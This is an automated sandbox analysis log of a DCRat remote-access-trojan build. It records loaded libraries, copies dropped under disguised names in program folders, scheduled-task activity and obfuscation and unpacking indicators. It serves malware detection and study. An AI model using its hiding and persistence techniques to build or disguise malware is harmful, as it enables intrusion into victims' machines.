            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: mmdevapi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: ksuser.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: avrt.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: audioses.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: midimap.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: mscoree.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: apphelp.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: version.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: uxtheme.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: windows.storage.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: wldp.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: profapi.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: cryptsp.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: rsaenh.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: cryptbase.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: sspicli.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: mscoree.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: apphelp.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: version.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: uxtheme.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: windows.storage.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: wldp.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: profapi.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: cryptsp.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: rsaenh.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: cryptbase.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: mscoree.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: version.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: uxtheme.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: windows.storage.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: wldp.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: profapi.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: cryptsp.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: rsaenh.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: cryptbase.dll
            Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeDirectory created: C:\Program Files\7-Zip\Lang\System.exeJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeDirectory created: C:\Program Files\7-Zip\Lang\27d1bcfc3c54e0Jump to behavior
            Source: DCRatBuild.exeStatic file information: File size 1165973 > 1048576
            Source: DCRatBuild.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: DCRatBuild.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: DCRatBuild.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: DCRatBuild.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: DCRatBuild.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: DCRatBuild.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: DCRatBuild.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: DCRatBuild.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DCRatBuild.exe
            Source: DCRatBuild.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: DCRatBuild.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: DCRatBuild.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: DCRatBuild.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: DCRatBuild.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, T8FCuuYe5ynxfEF8Wit.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, T8FCuuYe5ynxfEF8Wit.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            .NET source code contains potential unpacker
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, LmSC3EI6jv3Pr2T55hN.cs.Net Code: aPPfxPHqYN System.AppDomain.Load(byte[])
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, LmSC3EI6jv3Pr2T55hN.cs.Net Code: aPPfxPHqYN System.Reflection.Assembly.Load(byte[])
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, LmSC3EI6jv3Pr2T55hN.cs.Net Code: aPPfxPHqYN
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, LmSC3EI6jv3Pr2T55hN.cs.Net Code: aPPfxPHqYN System.AppDomain.Load(byte[])
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, LmSC3EI6jv3Pr2T55hN.cs.Net Code: aPPfxPHqYN System.Reflection.Assembly.Load(byte[])
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, LmSC3EI6jv3Pr2T55hN.cs.Net Code: aPPfxPHqYN
            Source: C:\Users\user\Desktop\DCRatBuild.exeFile created: C:\ChainBlocksurrogateagentFont\__tmp_rar_sfx_access_check_4418718Jump to behavior
            Source: DCRatBuild.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D7E28C push eax; ret 0_2_00D7E2AA
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D7ED46 push ecx; ret 0_2_00D7ED59
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeCode function: 6_2_00007FFD344700BD pushad ; iretd 6_2_00007FFD344700C1
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeCode function: 6_2_00007FFD3447798D pushfd ; ret 6_2_00007FFD34477993
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeCode function: 6_2_00007FFD34472B82 pushad ; retf 6_2_00007FFD34472C01
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeCode function: 6_2_00007FFD34472C02 pushad ; retf 6_2_00007FFD34472C01
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344800BD pushad ; iretd 20_2_00007FFD344800C1
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD34482B82 pushad ; retf 20_2_00007FFD34482C01
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD34482C02 pushad ; retf 20_2_00007FFD34482C01
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeCode function: 23_2_00007FFD344900BD pushad ; iretd 23_2_00007FFD344900C1
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeCode function: 23_2_00007FFD3449798D pushfd ; ret 23_2_00007FFD34497993
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeCode function: 23_2_00007FFD34492B83 pushad ; retf 23_2_00007FFD34492C01
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeCode function: 23_2_00007FFD34492C03 pushad ; retf 23_2_00007FFD34492C01
            Source: C:\Program Files\7-Zip\Lang\System.exeCode function: 24_2_00007FFD344600BD pushad ; iretd 24_2_00007FFD344600C1
            Source: C:\Program Files\7-Zip\Lang\System.exeCode function: 24_2_00007FFD3446798D pushfd ; ret 24_2_00007FFD34467993
            Source: C:\Program Files\7-Zip\Lang\System.exeCode function: 24_2_00007FFD34462B82 pushad ; retf 24_2_00007FFD34462C01
            Source: C:\Program Files\7-Zip\Lang\System.exeCode function: 24_2_00007FFD34462C02 pushad ; retf 24_2_00007FFD34462C01
            Source: C:\Program Files\7-Zip\Lang\System.exeCode function: 26_2_00007FFD344800BD pushad ; iretd 26_2_00007FFD344800C1
            Source: C:\Program Files\7-Zip\Lang\System.exeCode function: 26_2_00007FFD3448798D pushfd ; ret 26_2_00007FFD34487993
            Source: C:\Program Files\7-Zip\Lang\System.exeCode function: 26_2_00007FFD34482B82 pushad ; retf 26_2_00007FFD34482C01
            Source: C:\Program Files\7-Zip\Lang\System.exeCode function: 26_2_00007FFD34482C02 pushad ; retf 26_2_00007FFD34482C01
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, mkaNOOiu1fppM1vEm4.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'bidWPMi9hXRfwjqNkCq', 'TXgkN6iGyDJRRpiNVn5', 'oV2lDEix48WWBv9fcRJ', 'UYrfcZifyw8SDtbcMRW', 'urvSTri6ZY3GR2oUK32', 'K7sRioitZQXbg1K46Ca'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, oHNXMy1NgHLvYQhmElK.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'dNs5F6xHKHCtiaLhLfn', 'pAwCdQxAugGUfZd5YQ5', 'qsnI8pxVjymRDlAiZmv', 'VrKHBcxqHqZYSjbeIVe', 'bS3itpxID1gdqQUatLj', 'kexs3oxioG7rAfjLqsu'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, vdX4HB0KTgOBXGur3Q.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'TTjEbltxJ', 'Bv4KnnVvvGZkXdyNeBX', 'EhUFkgVEJQEkOL0VLv4', 'KlCdWOVe57mrCqBIikp', 'hAkBJXVLPaFQUvRvSRY', 'lifF9CVuFp2vlI206d8'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, KcJDbFfC3DNhp6PdPG9.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'BLrMXRm9C0', 'OBZsQGEEX2', 'lndMyH3yZP', 'X2STQL8Y17QLJM1a4c3', 'jBM5Ux8JgHRdO8G1aof', 'DVI0mA8MQCix27Keq5N', 'AoIGcm8jKZKIEigMEys', 'cYg5th80Sm4pkxCUNvu'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, sa2LD81iN9jvbHnyqYo.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'xBU2lQtPINJBcunG4YK', 'W6w6NXtDSCZc6NDthDn', 'KX1lIxtg9GueQYbvWh8', 'RDgiogt8HWJbIoxudhk', 'jJPAyBtnFQtCR6geHOG', 'm1LDM7t4pxOuQglIbDa'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, RjYdka8VUfxTCkuPy8.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'emS2v1irlXvaN6fingI', 'WxikmMi5QGkIRYdV72q', 'CHfgksis0bevLEhufKC', 'XB8ecrikZoBEnqXW2uE', 'VJavX7i2kvg3nqtLh5J', 'KXCPcdidu9awhPrh38Y'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, BtY0LefQ0AHEZt0pwhq.csHigh entropy of concatenated method names: 'ybfYhj1fgP', 'tEiYEnfwIJ', 'QmpYlFgfMF', 'vpYYqi6Dil', 'fmQYCwqwHm', 'M4gYdDuaRi', 'QShlwrZ7fXaD3NsyeaY', 'rL6QhZZFLCtEdmiS9Nk', 'l0ThxbZTNR0VtHCIjtl', 'yWiPsgZQi9eQWSr5CDT'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, CpUo31OI4nMA2NX4kN.csHigh entropy of concatenated method names: 'GQcGbZDqf', 'FK9Bc3yZM', 'lH874u8WT', 'rLcQMKAL2bQb8UeFM26', 'eQvjRnAE7QlhCe9fYpU', 'bHMpTPAecAATFnn5G2y', 'iFxZkOAukKpEvsmh2Yx', 'ma7ppTASUFlF8MWhE4i', 'TBvP8qAXCnWIL74ygOt', 'ex4BdrAo3J7uC6mNJyh'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ysPEmGnfkBKp6Pe80lF.csHigh entropy of concatenated method names: 'GRjF6sCgyZeI7SE6JSA', 'mwh88AC8FsABGpkOZqB', 'nr2PBYCP1aAWfKUBErB', 'Df1ToJCDWV4TOCX1dDe', 't1QtAAbjCQ', 'lQKxbaCNrpAjnir5sra', 'sVAhjXCFFqCe5k7yL1o', 'vILgqcCnYObjZjND2gL', 'uEnPpsC41TFC310SQFv', 'phkmfxCTsEW524Hp645'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, o2KOyQhJIjgo267adR.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'lR6fP7ItKXwlGyaZ9lc', 'vggRHXIcAR9qQJV2TfW', 'CX54IdIwlvAF0cUxZu2', 'OsCVTDIYTEgRIKeHZGM', 'jygidmIJ6Q087iGm3ap', 'kIkiZFIMWVDLXg69JwM'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, aC3Ov8QP2CxcBt18iNk.csHigh entropy of concatenated method names: 'kJSuBvVVKu', 'U2bu757y11', 'Y6SugwbFVm', 'zlHuXbvG6P', 'CZGuMXR79P', 'QfMdkZ4d3M58nqPHDJ2', 'kCNW174zPOJMxe0lnOj', 'Gvk7vE4kHdVRbqn0u6m', 'cJsVHk42pI5FCaPou45', 'T2SLm4NHpRIdh4db60O'
